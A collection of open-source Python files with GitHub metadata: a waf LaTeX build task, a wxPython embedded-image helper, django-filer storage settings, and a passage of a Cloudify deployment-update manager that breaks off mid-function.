self.aux_nodes+=p.ant_glob('*[0-9].aux')
def makeglossaries(self):
src_file=self.inputs[0].abspath()
base_file=os.path.basename(src_file)
base,_=os.path.splitext(base_file)
for aux_node in self.aux_nodes:
try:
ct=aux_node.read()
except EnvironmentError:
Logs.error('Error reading %s: %r'%aux_node.abspath())
continue
if g_glossaries_re.findall(ct):
if not self.env.MAKEGLOSSARIES:
raise Errors.WafError("The program 'makeglossaries' is missing!")
Logs.warn('calling makeglossaries')
self.env.SRCFILE=base
self.check_status('error when calling makeglossaries %s'%base,self.makeglossaries_fun())
return
def texinputs(self):
return os.pathsep.join([k.abspath()for k in self.texinputs_nodes])+os.pathsep
def run(self):
env=self.env
if not env['PROMPT_LATEX']:
env.append_value('LATEXFLAGS','-interaction=batchmode')
env.append_value('PDFLATEXFLAGS','-interaction=batchmode')
env.append_value('XELATEXFLAGS','-interaction=batchmode')
self.cwd=self.inputs[0].parent.get_bld().abspath()
Logs.info('first pass on %s'%self.__class__.__name__)
cur_hash=self.hash_aux_nodes()
self.call_latex()
self.hash_aux_nodes()
self.bibtopic()
self.bibfile()
self.bibunits()
self.makeindex()
self.makeglossaries()
for i in range(10):
prev_hash=cur_hash
cur_hash=self.hash_aux_nodes()
if not cur_hash:
Logs.error('No aux.h to process')
if cur_hash and cur_hash==prev_hash:
break
Logs.info('calling %s'%self.__class__.__name__)
self.call_latex()
def hash_aux_nodes(self):
try:
self.aux_nodes
except AttributeError:
try:
self.aux_nodes=self.scan_aux(self.inputs[0].change_ext('.aux'))
except IOError:
return None
return Utils.h_list([Utils.h_file(x.abspath())for x in self.aux_nodes])
def call_latex(self):
self.env.env={}
self.env.env.update(os.environ)
self.env.env.update({'TEXINPUTS':self.texinputs()})
self.env.SRCFILE=self.inputs[0].abspath()
self.check_status('error when calling latex',self.texfun())
class latex(tex):
texfun,vars=Task.compile_fun('${LATEX} ${LATEXFLAGS} ${SRCFILE}',shell=False)
class pdflatex(tex):
texfun,vars=Task.compile_fun('${PDFLATEX} ${PDFLATEXFLAGS} ${SRCFILE}',shell=False)
class xelatex(tex):
texfun,vars=Task.compile_fun('${XELATEX} ${XELATEXFLAGS} ${SRCFILE}',shell=False)
class dvips(Task.Task):
run_str='${DVIPS} ${DVIPSFLAGS} ${SRC} -o ${TGT}'
color='BLUE'
after=['latex','pdflatex','xelatex']
class dvipdf(Task.Task):
run_str='${DVIPDF} ${DVIPDFFLAGS} ${SRC} ${TGT}'
color='BLUE'
after=['latex','pdflatex','xelatex']
class pdf2ps(Task.Task):
run_str='${PDF2PS} ${PDF2PSFLAGS} ${SRC} ${TGT}'
color='BLUE'
after=['latex','pdflatex','xelatex']
@feature('tex')
@before_method('process_source')
def apply_tex(self):
if not getattr(self,'type',None)in('latex','pdflatex','xelatex'):
self.type='pdflatex'
outs=Utils.to_list(getattr(self,'outs',[]))
self.env['PROMPT_LATEX']=getattr(self,'prompt',1)
deps_lst=[]
if getattr(self,'deps',None):
deps=self.to_list(self.deps)
for dep in deps:
if isinstance(dep,str):
n=self.path.find_resource(dep)
if not n:
self.bld.fatal('Could not find %r for %r'%(dep,self))
if not n in deps_lst:
deps_lst.append(n)
elif isinstance(dep,Node.Node):
deps_lst.append(dep)
for node in self.to_nodes(self.source):
if self.type=='latex':
task=self.create_task('latex',node,node.change_ext('.dvi'))
elif self.type=='pdflatex':
task=self.create_task('pdflatex',node,node.change_ext('.pdf'))
elif self.type=='xelatex':
task=self.create_task('xelatex',node,node.change_ext('.pdf'))
task.env=self.env
if deps_lst:
for n in deps_lst:
if not n in task.dep_nodes:
task.dep_nodes.append(n)
if hasattr(self,'texinputs_nodes'):
task.texinputs_nodes=self.texinputs_nodes
else:
task.texinputs_nodes=[node.parent,node.parent.get_bld(),self.path,self.path.get_bld()]
lst=os.environ.get('TEXINPUTS','')
if self.env.TEXINPUTS:
lst+=os.pathsep+self.env.TEXINPUTS
if lst:
lst=lst.split(os.pathsep)
for x in lst:
if x:
if os.path.isabs(x):
p=self.bld.root.find_node(x)
if p:
task.texinputs_nodes.append(p)
else:
Logs.error('Invalid TEXINPUTS folder %s'%x)
else:
Logs.error('Cannot resolve relative paths in TEXINPUTS %s'%x)
if self.type=='latex':
if'ps'in outs:
tsk=self.create_task('dvips',task.outputs,node.change_ext('.ps'))
tsk.env.env=dict(os.environ)
if'pdf'in outs:
tsk=self.create_task('dvipdf',task.outputs,node.change_ext('.pdf'))
tsk.env.env=dict(os.environ)
elif self.type=='pdflatex':
if'ps'in outs:
self.create_task('pdf2ps',task.outputs,node.change_ext('.ps'))
self.source=[]
def configure(self):
v=self.env
for p in'tex latex pdflatex xelatex bibtex dvips dvipdf ps2pdf makeindex pdf2ps makeglossaries'.split():
try:
self.find_program(p,var=p.upper())
except self.errors.ConfigurationError:
pass
v['DVIPSFLAGS']='-Ppdf'
|
{
"content_hash": "175f0314c936497b01e40a72ef6e1117",
"timestamp": "",
"source": "github",
"line_count": 313,
"max_line_length": 190,
"avg_line_length": 33.52076677316294,
"alnum_prop": 0.6629813191002669,
"repo_name": "softDi/clusim",
"id": "a91fd9119f79dee7be47a2f6fce197c34abdb0ef",
"size": "10613",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "ns3/ns-3.26/.waf-1.8.19-b1fc8f7baef51bd2db4c2971909a568d/waflib/Tools/tex.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3021"
},
{
"name": "C",
"bytes": "365226"
},
{
"name": "C++",
"bytes": "24340132"
},
{
"name": "CSS",
"bytes": "3775"
},
{
"name": "Click",
"bytes": "19348"
},
{
"name": "Gnuplot",
"bytes": "9919"
},
{
"name": "HTML",
"bytes": "7942"
},
{
"name": "JavaScript",
"bytes": "7698"
},
{
"name": "Makefile",
"bytes": "92131"
},
{
"name": "Matlab",
"bytes": "39069"
},
{
"name": "Perl",
"bytes": "302716"
},
{
"name": "Perl 6",
"bytes": "151"
},
{
"name": "Python",
"bytes": "44191047"
},
{
"name": "QMake",
"bytes": "6602"
},
{
"name": "Shell",
"bytes": "146434"
}
],
"symlink_target": ""
}
|
import base64
import cStringIO
import wx
try:
b64decode = base64.b64decode
except AttributeError:
b64decode = base64.decodestring
class PyEmbeddedImage(object):
"""
PyEmbeddedImage is primarily intended to be used by code generated
by img2py as a means of embedding image data in a python module so
the image can be used at runtime without needing to access the
image from an image file. This makes distributing icons and such
that an application uses simpler since tools like py2exe will
automatically bundle modules that are imported, and the
application doesn't have to worry about how to locate the image
files on the user's filesystem.
The class can also be used for image data that may be acquired
from some other source at runtime, such as over the network or
from a database. In this case pass False for isBase64 (unless the
data actually is base64 encoded.) Any image type that
wx.ImageFromStream can handle should be okay.
"""
def __init__(self, data, isBase64=True):
self.data = data
self.isBase64 = isBase64
def GetBitmap(self):
return wx.BitmapFromImage(self.GetImage())
def GetData(self):
data = self.data
if self.isBase64:
data = b64decode(self.data)
return data
def GetIcon(self):
icon = wx.EmptyIcon()
icon.CopyFromBitmap(self.GetBitmap())
return icon
def GetImage(self):
stream = cStringIO.StringIO(self.GetData())
return wx.ImageFromStream(stream)
# added for backwards compatibility
getBitmap = GetBitmap
getData = GetData
getIcon = GetIcon
getImage = GetImage
# define properties, for convenience
Bitmap = property(GetBitmap)
Icon = property(GetIcon)
Image = property(GetImage)
|
{
"content_hash": "882c1f69009cc6c2f046cca6abfd86e1",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 70,
"avg_line_length": 30.725806451612904,
"alnum_prop": 0.6677165354330709,
"repo_name": "ktan2020/legacy-automation",
"id": "abf25b814866e3f1bfe9cad7138f64c656de9893",
"size": "2451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "win/Lib/site-packages/wx-3.0-msw/wx/lib/embeddedimage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ActionScript",
"bytes": "913"
},
{
"name": "Ada",
"bytes": "289"
},
{
"name": "Assembly",
"bytes": "687"
},
{
"name": "Boo",
"bytes": "540"
},
{
"name": "C",
"bytes": "40116"
},
{
"name": "C#",
"bytes": "474"
},
{
"name": "C++",
"bytes": "393"
},
{
"name": "CSS",
"bytes": "70883"
},
{
"name": "ColdFusion",
"bytes": "1012"
},
{
"name": "Common Lisp",
"bytes": "1034"
},
{
"name": "D",
"bytes": "1858"
},
{
"name": "Eiffel",
"bytes": "426"
},
{
"name": "Erlang",
"bytes": "9243"
},
{
"name": "FORTRAN",
"bytes": "1810"
},
{
"name": "Forth",
"bytes": "182"
},
{
"name": "Groovy",
"bytes": "2366"
},
{
"name": "Haskell",
"bytes": "816"
},
{
"name": "Haxe",
"bytes": "455"
},
{
"name": "Java",
"bytes": "1155"
},
{
"name": "JavaScript",
"bytes": "69444"
},
{
"name": "Lua",
"bytes": "795"
},
{
"name": "Matlab",
"bytes": "1278"
},
{
"name": "OCaml",
"bytes": "350"
},
{
"name": "Objective-C++",
"bytes": "885"
},
{
"name": "PHP",
"bytes": "1411"
},
{
"name": "Pascal",
"bytes": "388"
},
{
"name": "Perl",
"bytes": "252651"
},
{
"name": "Pike",
"bytes": "589"
},
{
"name": "Python",
"bytes": "42085780"
},
{
"name": "R",
"bytes": "1156"
},
{
"name": "Ruby",
"bytes": "480"
},
{
"name": "Scheme",
"bytes": "282"
},
{
"name": "Shell",
"bytes": "30518"
},
{
"name": "Smalltalk",
"bytes": "926"
},
{
"name": "Squirrel",
"bytes": "697"
},
{
"name": "Stata",
"bytes": "302"
},
{
"name": "SystemVerilog",
"bytes": "3145"
},
{
"name": "Tcl",
"bytes": "1039"
},
{
"name": "TeX",
"bytes": "1746"
},
{
"name": "VHDL",
"bytes": "985"
},
{
"name": "Vala",
"bytes": "664"
},
{
"name": "Verilog",
"bytes": "439"
},
{
"name": "Visual Basic",
"bytes": "2142"
},
{
"name": "XSLT",
"bytes": "152770"
},
{
"name": "ooc",
"bytes": "890"
},
{
"name": "xBase",
"bytes": "769"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.core.files.storage import get_storage_class
from filer.utils.loader import load_object
from filer.utils.recursive_dictionary import RecursiveDictionaryWithExcludes
import os
FILER_IMAGE_MODEL = getattr(settings, 'FILER_IMAGE_MODEL', False)
FILER_DEBUG = getattr(settings, 'FILER_DEBUG', False) # When True makes
FILER_SUBJECT_LOCATION_IMAGE_DEBUG = getattr(settings, 'FILER_SUBJECT_LOCATION_IMAGE_DEBUG', False)
FILER_WHITESPACE_COLOR = getattr(settings, 'FILER_WHITESPACE_COLOR', '#FFFFFF')
FILER_0_8_COMPATIBILITY_MODE = getattr(settings, 'FILER_0_8_COMPATIBILITY_MODE', False)
FILER_ENABLE_LOGGING = getattr(settings, 'FILER_ENABLE_LOGGING', False)
if FILER_ENABLE_LOGGING:
FILER_ENABLE_LOGGING = (
FILER_ENABLE_LOGGING and (getattr(settings, 'LOGGING') and
('' in settings.LOGGING['loggers'] or
'filer' in settings.LOGGING['loggers'])))
FILER_ENABLE_PERMISSIONS = getattr(settings, 'FILER_ENABLE_PERMISSIONS', False)
FILER_ALLOW_REGULAR_USERS_TO_ADD_ROOT_FOLDERS = getattr(settings, 'FILER_ALLOW_REGULAR_USERS_TO_ADD_ROOT_FOLDERS', False)
FILER_IS_PUBLIC_DEFAULT = getattr(settings, 'FILER_IS_PUBLIC_DEFAULT', True)
FILER_PAGINATE_BY = getattr(settings, 'FILER_PAGINATE_BY', 20)
FILER_ADMIN_ICON_SIZES = getattr(settings,"FILER_ADMIN_ICON_SIZES", (
'16', '32', '48', '64',
))
# This is an ordered iterable that describes a list of
# classes that I should check for when adding files
FILER_FILE_MODELS = getattr(settings, 'FILER_FILE_MODELS', (
FILER_IMAGE_MODEL if FILER_IMAGE_MODEL else 'filer.models.imagemodels.Image',
'filer.models.filemodels.File',))
DEFAULT_FILE_STORAGE = getattr(settings, 'DEFAULT_FILE_STORAGE', 'django.core.files.storage.FileSystemStorage')
MINIMAL_FILER_STORAGES = {
'public': {
'main': {
'ENGINE': None,
'OPTIONS': {},
},
'thumbnails': {
'ENGINE': None,
'OPTIONS': {},
}
},
'private': {
'main': {
'ENGINE': None,
'OPTIONS': {},
},
'thumbnails': {
'ENGINE': None,
'OPTIONS': {},
},
},
}
DEFAULT_FILER_STORAGES = {
'public': {
'main': {
'ENGINE': DEFAULT_FILE_STORAGE,
'OPTIONS': {},
'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
'UPLOAD_TO_PREFIX': 'filer_public',
},
'thumbnails': {
'ENGINE': DEFAULT_FILE_STORAGE,
'OPTIONS': {},
'THUMBNAIL_OPTIONS': {
'base_dir': 'filer_public_thumbnails',
},
},
},
'private': {
'main': {
'ENGINE': 'filer.storage.PrivateFileSystemStorage',
'OPTIONS': {
'location': os.path.abspath(os.path.join(settings.MEDIA_ROOT, '../smedia/filer_private')),
'base_url': '/smedia/filer_private/',
},
'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
'UPLOAD_TO_PREFIX': '',
},
'thumbnails': {
'ENGINE': 'filer.storage.PrivateFileSystemStorage',
'OPTIONS': {
'location': os.path.abspath(os.path.join(settings.MEDIA_ROOT, '../smedia/filer_private_thumbnails')),
'base_url': '/smedia/filer_private_thumbnails/',
},
'THUMBNAIL_OPTIONS': {},
},
},
}
MINIMAL_FILER_SERVERS = {
'private': {
'main': {
'ENGINE': None,
'OPTIONS': {},
},
'thumbnails': {
'ENGINE': None,
'OPTIONS': {},
},
},
}
DEFAULT_FILER_SERVERS = {
'private': {
'main': {
'ENGINE': 'filer.server.backends.default.DefaultServer',
'OPTIONS': {},
},
'thumbnails': {
'ENGINE': 'filer.server.backends.default.DefaultServer',
'OPTIONS': {},
},
},
}
FILER_STORAGES = RecursiveDictionaryWithExcludes(MINIMAL_FILER_STORAGES, rec_excluded_keys=('OPTIONS', 'THUMBNAIL_OPTIONS'))
if FILER_0_8_COMPATIBILITY_MODE:
user_filer_storages = {
'public': {
'main': {
'ENGINE': DEFAULT_FILE_STORAGE,
'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
'UPLOAD_TO_PREFIX': getattr(settings, 'FILER_PUBLICMEDIA_PREFIX', 'filer_public'),
},
'thumbnails': {
'ENGINE': DEFAULT_FILE_STORAGE,
'OPTIONS': {},
'THUMBNAIL_OPTIONS': {
'base_dir': 'filer_public_thumbnails',
},
},
},
'private': {
'main': {
'ENGINE': DEFAULT_FILE_STORAGE,
'UPLOAD_TO': 'filer.utils.generate_filename.randomized',
'UPLOAD_TO_PREFIX': getattr(settings, 'FILER_PRIVATEMEDIA_PREFIX', 'filer_private'),
},
'thumbnails': {
'ENGINE': DEFAULT_FILE_STORAGE,
'OPTIONS': {},
'THUMBNAIL_OPTIONS': {
'base_dir': 'filer_private_thumbnails',
},
},
},
}
else:
user_filer_storages = getattr(settings, 'FILER_STORAGES', {})
FILER_STORAGES.rec_update(user_filer_storages)
def update_storage_settings(user_settings, defaults, s, t):
if not user_settings[s][t]['ENGINE']:
user_settings[s][t]['ENGINE'] = defaults[s][t]['ENGINE']
user_settings[s][t]['OPTIONS'] = defaults[s][t]['OPTIONS']
if t == 'main':
if 'UPLOAD_TO' not in user_settings[s][t]:
user_settings[s][t]['UPLOAD_TO'] = defaults[s][t]['UPLOAD_TO']
if 'UPLOAD_TO_PREFIX' not in user_settings[s][t]:
user_settings[s][t]['UPLOAD_TO_PREFIX'] = defaults[s][t]['UPLOAD_TO_PREFIX']
if t == 'thumbnails':
if 'THUMBNAIL_OPTIONS' not in user_settings[s][t]:
user_settings[s][t]['THUMBNAIL_OPTIONS'] = defaults[s][t]['THUMBNAIL_OPTIONS']
return user_settings
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'public', 'main')
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'public', 'thumbnails')
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'private', 'main')
update_storage_settings(FILER_STORAGES, DEFAULT_FILER_STORAGES, 'private', 'thumbnails')
FILER_SERVERS = RecursiveDictionaryWithExcludes(MINIMAL_FILER_SERVERS, rec_excluded_keys=('OPTIONS',))
FILER_SERVERS.rec_update(getattr(settings, 'FILER_SERVERS', {}))
def update_server_settings(settings, defaults, s, t):
if not settings[s][t]['ENGINE']:
settings[s][t]['ENGINE'] = defaults[s][t]['ENGINE']
settings[s][t]['OPTIONS'] = defaults[s][t]['OPTIONS']
return settings
update_server_settings(FILER_SERVERS, DEFAULT_FILER_SERVERS, 'private', 'main')
update_server_settings(FILER_SERVERS, DEFAULT_FILER_SERVERS, 'private', 'thumbnails')
# Public media (media accessible without any permission checks)
FILER_PUBLICMEDIA_STORAGE = get_storage_class(FILER_STORAGES['public']['main']['ENGINE'])(**FILER_STORAGES['public']['main']['OPTIONS'])
FILER_PUBLICMEDIA_UPLOAD_TO = load_object(FILER_STORAGES['public']['main']['UPLOAD_TO'])
if 'UPLOAD_TO_PREFIX' in FILER_STORAGES['public']['main']:
FILER_PUBLICMEDIA_UPLOAD_TO = load_object('filer.utils.generate_filename.prefixed_factory')(FILER_PUBLICMEDIA_UPLOAD_TO, FILER_STORAGES['public']['main']['UPLOAD_TO_PREFIX'])
FILER_PUBLICMEDIA_THUMBNAIL_STORAGE = get_storage_class(FILER_STORAGES['public']['thumbnails']['ENGINE'])(**FILER_STORAGES['public']['thumbnails']['OPTIONS'])
FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS = FILER_STORAGES['public']['thumbnails']['THUMBNAIL_OPTIONS']
# Private media (media accessible through permissions checks)
FILER_PRIVATEMEDIA_STORAGE = get_storage_class(FILER_STORAGES['private']['main']['ENGINE'])(**FILER_STORAGES['private']['main']['OPTIONS'])
FILER_PRIVATEMEDIA_UPLOAD_TO = load_object(FILER_STORAGES['private']['main']['UPLOAD_TO'])
if 'UPLOAD_TO_PREFIX' in FILER_STORAGES['private']['main']:
FILER_PRIVATEMEDIA_UPLOAD_TO = load_object('filer.utils.generate_filename.prefixed_factory')(FILER_PRIVATEMEDIA_UPLOAD_TO, FILER_STORAGES['private']['main']['UPLOAD_TO_PREFIX'])
FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE = get_storage_class(FILER_STORAGES['private']['thumbnails']['ENGINE'])(**FILER_STORAGES['private']['thumbnails']['OPTIONS'])
FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS = FILER_STORAGES['private']['thumbnails']['THUMBNAIL_OPTIONS']
FILER_PRIVATEMEDIA_SERVER = load_object(FILER_SERVERS['private']['main']['ENGINE'])(**FILER_SERVERS['private']['main']['OPTIONS'])
FILER_PRIVATEMEDIA_THUMBNAIL_SERVER = load_object(FILER_SERVERS['private']['thumbnails']['ENGINE'])(**FILER_SERVERS['private']['thumbnails']['OPTIONS'])
FILER_DUMP_PAYLOAD = getattr(settings, 'FILER_DUMP_PAYLOAD', False) # Whether the filer shall dump the files payload
FILER_CANONICAL_URL = getattr(settings, 'FILER_CANONICAL_URL', 'canonical/')
|
{
"content_hash": "48f854e30cca3501af8ae3713e048908",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 181,
"avg_line_length": 41.87614678899082,
"alnum_prop": 0.6155110088728228,
"repo_name": "Venturi/oldcms",
"id": "a5ea0cfdf020524bfb311e3641e65e3c83914478",
"size": "9154",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/filer/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "CSS",
"bytes": "418090"
},
{
"name": "HTML",
"bytes": "467117"
},
{
"name": "JavaScript",
"bytes": "916100"
},
{
"name": "PHP",
"bytes": "2231"
},
{
"name": "Python",
"bytes": "15786894"
},
{
"name": "Ruby",
"bytes": "990"
},
{
"name": "Shell",
"bytes": "3743"
},
{
"name": "XSLT",
"bytes": "157892"
}
],
"symlink_target": ""
}
|
import copy
import os
import uuid
from flask import current_app
from dsl_parser import constants, tasks
from dsl_parser import exceptions as parser_exceptions
from manager_rest import config
from manager_rest.constants import CURRENT_TENANT_CONFIG
from manager_rest import app_context, manager_exceptions
from manager_rest.storage import get_storage_manager, models
from manager_rest.storage.models_states import ExecutionState
from manager_rest import workflow_executor
from manager_rest import utils
from manager_rest.resource_manager import ResourceManager
from manager_rest.deployment_update import step_extractor
from manager_rest.deployment_update.utils import extract_ids
from manager_rest.deployment_update.validator import StepValidator
from manager_rest.deployment_update.constants import (
STATES,
NODE_MOD_TYPES,
DEFAULT_DEPLOYMENT_UPDATE_WORKFLOW
)
from manager_rest.deployment_update.handlers import (
DeploymentUpdateNodeHandler,
DeploymentUpdateNodeInstanceHandler,
DeploymentUpdateDeploymentHandler
)
class DeploymentUpdateManager(object):
def __init__(self):
self.sm = get_storage_manager()
self._node_handler = DeploymentUpdateNodeHandler()
self._node_instance_handler = DeploymentUpdateNodeInstanceHandler()
self._deployment_handler = DeploymentUpdateDeploymentHandler()
self._step_validator = StepValidator()
def get_deployment_update(self, deployment_update_id):
"""Return the deployment update object
:param deployment_update_id:
:return:
"""
return self.sm.get(models.DeploymentUpdate, deployment_update_id)
def list_deployment_updates(self, include=None, filters=None,
pagination=None, sort=None):
"""Return a list of deployment updates.
:param include:
:param filters:
:param pagination:
:param sort:
:return:
"""
return self.sm.list(
models.DeploymentUpdate,
include=include,
filters=filters,
pagination=pagination,
sort=sort
)
def stage_deployment_update(self,
deployment_id,
app_dir,
app_blueprint,
additional_inputs):
"""Stage a deployment update
:param app_blueprint:
:param app_dir:
:param deployment_id: the deployment id for the update
:return:
"""
# enables reverting to original blueprint resources
deployment = self.sm.get(models.Deployment, deployment_id)
blueprint_id = deployment.blueprint_id
file_server_root = config.instance.file_server_root
blueprint_resource_dir = os.path.join(
file_server_root,
'blueprints',
current_app.config[CURRENT_TENANT_CONFIG].name,
blueprint_id)
# The dsl parser expects a URL
blueprint_resource_dir_url = 'file:{0}'.format(blueprint_resource_dir)
app_path = os.path.join(file_server_root, app_dir, app_blueprint)
# parsing the blueprint from here
try:
plan = tasks.parse_dsl(
app_path,
resources_base_path=file_server_root,
additional_resources=[blueprint_resource_dir_url],
**app_context.get_parser_context())
except parser_exceptions.DSLParsingException as ex:
raise manager_exceptions.InvalidBlueprintError(
'Invalid blueprint - {0}'.format(ex))
# Updating the new inputs with the deployment inputs
# (overriding old values and adding new ones)
inputs = copy.deepcopy(deployment.inputs)
inputs.update(additional_inputs)
# applying intrinsic functions
try:
prepared_plan = tasks.prepare_deployment_plan(plan, inputs=inputs)
except parser_exceptions.MissingRequiredInputError, e:
raise manager_exceptions.MissingRequiredDeploymentInputError(
str(e))
except parser_exceptions.UnknownInputError, e:
raise manager_exceptions.UnknownDeploymentInputError(str(e))
deployment_update_id = '{0}-{1}'.format(deployment.id, uuid.uuid4())
deployment_update = models.DeploymentUpdate(
id=deployment_update_id,
deployment_plan=prepared_plan,
created_at=utils.get_formatted_timestamp()
)
deployment_update.set_deployment(deployment)
self.sm.put(deployment_update)
return deployment_update
def create_deployment_update_step(self,
deployment_update_id,
action,
entity_type,
entity_id):
"""Create deployment update step
:param deployment_update_id:
:param action: add/remove/modify
:param entity_type: add/relationship
:param entity_id:
:return:
"""
step = models.DeploymentUpdateStep(
id=str(uuid.uuid4()),
action=action,
entity_type=entity_type,
entity_id=entity_id,
)
deployment_update = self.get_deployment_update(deployment_update_id)
step.set_deployment_update(deployment_update)
return self.sm.put(step)
def extract_steps_from_deployment_update(self, deployment_update):
supported_steps, unsupported_steps = \
step_extractor.extract_steps(deployment_update)
if not unsupported_steps:
for step in supported_steps:
self.create_deployment_update_step(
deployment_update_id=deployment_update.id,
action=step.action,
entity_type=step.entity_type,
entity_id=step.entity_id,
)
# if there are unsupported steps, raise an exception telling the user
# about these unsupported steps
else:
deployment_update.state = STATES.FAILED
self.sm.update(deployment_update)
unsupported_entity_ids = [step.entity_id
for step in unsupported_steps]
raise \
manager_exceptions.UnsupportedChangeInDeploymentUpdate(
'The blueprint you provided for the deployment update '
'contains changes currently unsupported by the deployment '
'update mechanism.\n'
'Unsupported changes: {0}'
.format('\n'.join(unsupported_entity_ids)))
def commit_deployment_update(self,
dep_update,
skip_install=False,
skip_uninstall=False,
workflow_id=None):
"""commit the deployment update steps
:param dep_update:
:param skip_install:
:param skip_uninstall:
:param workflow_id:
:return:
"""
# mark deployment update as committing
dep_update.state = STATES.UPDATING
self.sm.update(dep_update)
# Handle any deployment related changes. i.e. workflows and deployments
modified_deployment_entities, raw_updated_deployment = \
self._deployment_handler.handle(dep_update)
# Retrieve previous_nodes
previous_nodes = \
[node.to_dict() for node in self.sm.list(
models.Node,
filters={'deployment_id': dep_update.deployment_id})]
# Update the nodes on the storage
modified_entity_ids, depup_nodes = \
self._node_handler.handle(dep_update)
# Extract changes from raw nodes
node_instance_changes = self._extract_changes(dep_update,
depup_nodes,
previous_nodes)
# Create (and update for adding step type) node instances
# according to the changes in raw_nodes
depup_node_instances = \
self._node_instance_handler.handle(dep_update,
node_instance_changes)
# Saving the needed changes back to sm for future use
# (removing entities).
dep_update.deployment_update_deployment = raw_updated_deployment
dep_update.deployment_update_nodes = depup_nodes
dep_update.deployment_update_node_instances = depup_node_instances
dep_update.modified_entity_ids = \
modified_entity_ids.to_dict(include_rel_order=True)
self.sm.update(dep_update)
# Execute the default 'update' workflow or a custom workflow using
# added and related instances. Any workflow executed should call
# finalize_update, since removing entities should be done after the
# executions.
# The raw_node_instances are being used only for their ids, Thus
# They should really hold the finished version for the node instance.
execution = self._execute_update_workflow(
dep_update,
depup_node_instances,
modified_entity_ids.to_dict(),
skip_install=skip_install,
skip_uninstall=skip_uninstall,
workflow_id=workflow_id)
dep_update.execution = execution
dep_update.state = STATES.EXECUTING_WORKFLOW
self.sm.update(dep_update)
return self.get_deployment_update(dep_update.id)
def validate_no_active_updates_per_deployment(self,
deployment_id,
force=False):
"""
Validate there are no active updates for provided deployment.
raises conflict error if there are any.
:param deployment_id: deployment id
:param force: force
"""
existing_updates = \
self.list_deployment_updates(filters={
'deployment_id': deployment_id
}).items
active_updates = [u for u in existing_updates if u.state
not in (STATES.SUCCESSFUL, STATES.FAILED)]
if active_updates:
if not force:
raise manager_exceptions.ConflictError(
'there are deployment updates still active; '
'update IDs: {0}'.format(
', '.join([u.id for u in active_updates])))
# real active updates are those with
# an execution in a running status
real_active_updates = \
[u for u in active_updates if u.execution_id is not None and
self.sm.get(models.Execution, u.execution_id).status not in
ExecutionState.END_STATES]
if real_active_updates:
raise manager_exceptions.ConflictError(
'there are deployment updates still active; the "force" '
'flag was used yet these updates have actual executions '
'running update IDs: {0}'.format(
', '.join([u.id for u in real_active_updates])))
else:
# the active updates aren't really active - either their
# executions were failed/cancelled, or the update failed at
# the finalizing stage.
# updating their states to failed and continuing.
for dep_update in active_updates:
dep_update.state = STATES.FAILED
self.sm.update(dep_update)
def _extract_changes(self,
dep_update,
raw_nodes,
previous_nodes):
"""Extracts the changes between the current node_instances and
the raw_nodes specified
:param dep_update:
:param raw_nodes:
:return: a dictionary of modification type and node instanced modified
"""
deployment = self.sm.get(models.Deployment, dep_update.deployment_id)
deployment_id_filter = {'deployment_id': deployment.id}
# By this point the node_instances aren't updated yet
previous_node_instances = \
[instance.to_dict() for instance in
self.sm.list(models.NodeInstance, filters=deployment_id_filter)]
# extract all the None relationships from the depup nodes in order
# to use in the extract changes
no_none_relationships_nodes = copy.deepcopy(raw_nodes)
for node in no_none_relationships_nodes:
node['relationships'] = [r for r in node['relationships'] if r]
# project changes in deployment
changes = tasks.modify_deployment(
nodes=no_none_relationships_nodes,
previous_nodes=previous_nodes,
previous_node_instances=previous_node_instances,
scaling_groups=deployment.scaling_groups,
modified_nodes=()
)
self._patch_changes_with_relationship_index(
changes[NODE_MOD_TYPES.EXTENDED_AND_RELATED],
raw_nodes)
return changes
@staticmethod
def _patch_changes_with_relationship_index(raw_node_instances, raw_nodes):
for raw_node_instance in (i for i in raw_node_instances
if 'modification' in i):
raw_node = next(n for n in raw_nodes
if n['id'] == raw_node_instance['node_id'])
for relationship in raw_node_instance['relationships']:
target_node_id = relationship['target_name']
rel_index = \
next(i for i, d in enumerate(raw_node['relationships'])
if d['target_id'] == target_node_id)
relationship['rel_index'] = rel_index
def _execute_update_workflow(self,
dep_update,
node_instances,
modified_entity_ids,
skip_install=False,
skip_uninstall=False,
workflow_id=None):
"""Executed the update workflow or a custom workflow
:param dep_update:
:param node_instances: a dictionary of modification type and
add_node.modification instances
:param modified_entity_ids: the entire add_node.modification entities
list (by id)
:return:
"""
added_instances = node_instances[NODE_MOD_TYPES.ADDED_AND_RELATED]
extended_instances = \
node_instances[NODE_MOD_TYPES.EXTENDED_AND_RELATED]
reduced_instances = node_instances[NODE_MOD_TYPES.REDUCED_AND_RELATED]
removed_instances = node_instances[NODE_MOD_TYPES.REMOVED_AND_RELATED]
parameters = {
# needed in order to finalize the commit
'update_id': dep_update.id,
# For any added node instance
'added_instance_ids':
extract_ids(added_instances.get(NODE_MOD_TYPES.AFFECTED)),
'added_target_instances_ids':
extract_ids(added_instances.get(NODE_MOD_TYPES.RELATED)),
# encapsulated all the change entity_ids (in a dictionary with
# 'node' and 'relationship' keys.
'modified_entity_ids': modified_entity_ids,
# Any nodes which were extended (positive modification)
'extended_instance_ids':
extract_ids(extended_instances.get(NODE_MOD_TYPES.AFFECTED)),
'extend_target_instance_ids':
extract_ids(extended_instances.get(NODE_MOD_TYPES.RELATED)),
# Any nodes which were reduced (negative modification)
'reduced_instance_ids':
extract_ids(reduced_instances.get(NODE_MOD_TYPES.AFFECTED)),
'reduce_target_instance_ids':
extract_ids(reduced_instances.get(NODE_MOD_TYPES.RELATED)),
# Any nodes which were removed as a whole
